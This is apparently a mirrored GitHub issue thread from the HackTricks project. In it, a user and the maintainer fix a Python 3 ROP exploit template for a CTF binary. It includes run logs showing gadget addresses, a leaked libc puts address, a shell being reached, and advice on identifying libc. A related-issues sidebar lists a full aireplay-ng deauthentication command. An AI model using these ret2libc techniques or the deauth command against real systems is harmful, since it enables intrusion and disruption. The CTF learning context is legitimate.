Comments (7)
Hi @wafflesx90,
The goal of using https://LIBC.blukat.me/ is to identify the libc used by the vulnerable binary.
As not all the libc functions are going to be loaded inside the GOT of the binary (only the ones used), I would recommend you to take a look to the binary and using the template exfiltrate the address of more than on libc function used by your binary.
Then, put all the leaked addresses in the web to find which libc is used.
from hacktricks.
Hi @wafflesx90!
I have updated that script and put OFFSET
as bytes type object, could test it now?
from hacktricks.
Greetings,
Thank you for the quick reply. Also, I have tested your updated template in the same environment with the following results.
$ python3 ROP-PWN-template.py
[+] Starting local process './vuln': pid 4816
[] '/home/palmistry/CTF/vuln'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
[] Loaded 14 cached gadgets for './vuln'
[] Main start: 0x401156
[] Puts plt: 0x401054
[] pop rdi; ret gadget: 0x4011f3
[] puts GOT @ 0x404018
b'Simple ROP.\n'
Traceback (most recent call last):
File "ROP-PWN-template.py", line 90, in
get_addr("puts") #Search for puts address in memmory to obtains libc base
File "ROP-PWN-template.py", line 81, in get_addr
leak = u64(recieved.ljust(8, "\x00"))
TypeError: ljust() argument 2 must be a byte string of length 1, not str
from hacktricks.
after reading those errors I'm starting to think that this template was for python2 and not for python3.
Anyway, I have fixed also that one, let me know if that works now.
from hacktricks.
Hi mate,
I have used this template for a CTF challenge and I have improve it.
Test it and let me know if it works for you.
from hacktricks.
Cheers,
I was able to successfully execute the updated template and drop into a shell. I really appreciate you taking time to update the script to python3 capability.
Also, I realize this is outside the scope of the original ticket and not related to your script, but I was hoping you could briefly enlighten me on the query fields to leak libc on https://libc.blukat.me
On the website I filled the first query field with 'puts' and applied the following inside the field
[*] Leaked LIBC address, puts: 0x7f7f1a6165a0
but on your Hack Trick series I see you have a field '__libc_start_main' filled out too.
I had the following data before applying a version of libc, and no matter what information I filled into the '__libc_start_main' it would return an error. The only field that returned several version of libc was [*] Leaked LIBC address, puts: 0x7f7f1a6165a0 not '__libc_start_main'
[] Loaded 14 cached gadgets for './vuln'
[] Main start: 0x401156
[] Puts plt: 0x401054
[] pop rdi; ret gadget: 0x4011f3
[] ret gadget: 0x40101a
[] puts GOT @ 0x404018
[] Payload aligned successfully
b'Simple ROP.\n'
[] Len rop1: 80
[] Leaked LIBC address, puts: 0x7f7f1a6165a0
TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)
[] Switching to interactive mode
Simple ROP.
$ ls
[*] Got EOF while reading in interactive
If this question is outside the scope of the issue or you don't have an explanation, please considered the original issue resolved and happy to close the ticket.
Thanks again!
from hacktricks.
I really appreciate moving the issue to resolved over the weekend and getting back to me on questions. You have a great deal of knowledge and hope to see more from you in the very near future!
Cheers,
from hacktricks.
Related Issues (20)
- out-of-band data exfiltration Command Injection Problem HOT 1
- [Suggestion] Add Windows/Linux equivalent to powerview HOT 1
- Minor typo at pentesting-web/hacking-jwt-json-web-tokens.md
- suggestion to add memory automation tool in cloud HOT 1
- typo desofuscation-vbs-cscript.exe.md I believe it should be deobfuscation HOT 1
- HACKTRICKS DEAD HOT 1
- HACKTRICKS DEAD HOT 1
- [Suggestion] Section for Industrial Control Systems (ICS) and SCADA Hacking HOT 1
- Does the dark mode is gone? HOT 2
- Bash zphisher HOT 1
- Wrong CVE is signed to JWT none exploit HOT 1
- Brute force section for VNC includes incorrect command HOT 1
- aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0 HOT 1
- [email protected]
- Capture The Flags
- Fix Typo in title of Wmiexec HOT 2
- In case if you get time and want to add these test cases (which are not overlapping) HOT 1
- Broken Wordlist Reference Link in Cache-Deception Special Header HOT 2
- Gitbook asset filenames too long for windows HOT 1
- Red Teaming Scenarios
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from hacktricks.